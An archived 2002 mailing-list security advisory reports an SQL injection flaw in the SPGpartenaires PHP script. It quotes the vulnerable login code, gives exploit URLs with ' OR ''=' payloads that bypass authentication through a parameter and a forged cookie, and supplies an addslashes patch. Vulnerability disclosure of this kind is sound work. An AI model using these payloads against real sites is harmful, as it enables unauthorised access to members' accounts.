SPGpartenaires (PHP)

From: Frog Man (leseulfrogat_private)
Date: Fri Dec 20 2002 - 03:51:17 PST


    Information :
    °°°°°°°°°°°°°
    Version : up to and including 3.0.1 (earliest affected version unknown)
    Website : http://www.scripts-php-gratuits.com
    Problem : SQL injection -> access to members' accounts
    
    PHP Code/Location :
    °°°°°°°°°°°°°°°°°°°
    modif/ident.php :
    --------------------------------------------------
    [...]
    // $id and $pass come straight from the request (register_globals) and are
    // concatenated into the query without escaping: a single quote in either
    // value breaks out of the string literal.
    $sql="SELECT nomsite FROM SPGPartenaires WHERE id='".$id."' AND 
    motdepasse='".$pass."'";
    $re=@mysql_db_query($db_name,$sql,$connect);
    $result=@mysql_fetch_array($re);
    if(empty($result[0]))
    {
    header("location: index.php?msg=Identification+incorrecte+!");
    }
    else
    {
    setcookie("SPGP",$id."||".$pass,time()+84600,"");
    header("location: index2.php");
    }
    [...]
    --------------------------------------------------
    
    
    modif/delete.php, modif/index2.php, modif/modif.php, modif/modif_suite.php :
    --------------------------------------------------------------
    <?
    if(!isset($SPGP))
    {
    header("location: index.php?msg=Veuillez+vous+identifier+!");
    }
    else
    {
    // $SPGP is the id||password cookie set by ident.php (or, with
    // register_globals, any request variable of that name); both halves are
    // again concatenated into the query unescaped.
    $inf=explode("||",$SPGP);
    [...]
    $sql="SELECT id FROM SPGPartenaires WHERE id='".$inf[0]."' AND 
    motdepasse='".$inf[1]."'";
    $re=@mysql_db_query($db_name,$sql,$connect);
    $result=@mysql_fetch_array($re);
    if(empty($result[0]))
    {
    header("location: index.php?msg=Veuillez+vous+identifier+!");
    }
    [...]
    --------------------------------------------------------------
    
    
    Exploits :
    °°°°°°°°°°
    http://[target]/modif/ident.php?id=[MEMBERID]&pass='%20OR%20''='
    (the pass value decodes to ' OR ''= and turns the WHERE clause into
    id='[MEMBERID]' AND motdepasse='' OR ''='', which is always true)
    or, passing the SPGP value directly in the query string (because of
    register_globals it is treated exactly like the cookie) :
    ?SPGP=[ID]%7C%7C'%20OR%20''='
    against any of :
    - modif/delete.php
    - modif/index2.php
    - modif/modif.php
    - modif/modif_suite.php
    
    
    Patch :
    °°°°°°°
    In modif/ident.php replace the line :
    ----------------------------------------------------------------
    $sql="SELECT nomsite FROM SPGPartenaires WHERE id='".$id."' AND 
    motdepasse='".$pass."'";
    ----------------------------------------------------------------
    by :
    ---------------------------------------------------------------
    $sql="SELECT nomsite FROM SPGPartenaires WHERE id='".addslashes($id)."' AND 
    motdepasse='".addslashes($pass)."'";
    ---------------------------------------------------------------
    
    And in the other files replace the line :
    ---------------------------------------------------------------
    $sql="SELECT id FROM SPGPartenaires WHERE id='".$inf[0]."' AND 
    motdepasse='".$inf[1]."'";
    ---------------------------------------------------------------
    by :
    ---------------------------------------------------------------
    $sql="SELECT id FROM SPGPartenaires WHERE id='".addslashes($inf[0])."' AND 
    motdepasse='".addslashes($inf[1])."'";
    ---------------------------------------------------------------
    
    A patch can be found on http://www.phpsecure.org.
    
    More details :
    °°°°°°°°°°°°°°
    In French :
    http://www.frog-man.org/tutos/SPGpartenaires.txt
    Translated by Google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FSPGpartenaires.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
    
    
    frog-m@n
    
    
    
    



    This archive was generated by hypermail 2b30 : Fri Dec 20 2002 - 19:54:28 PST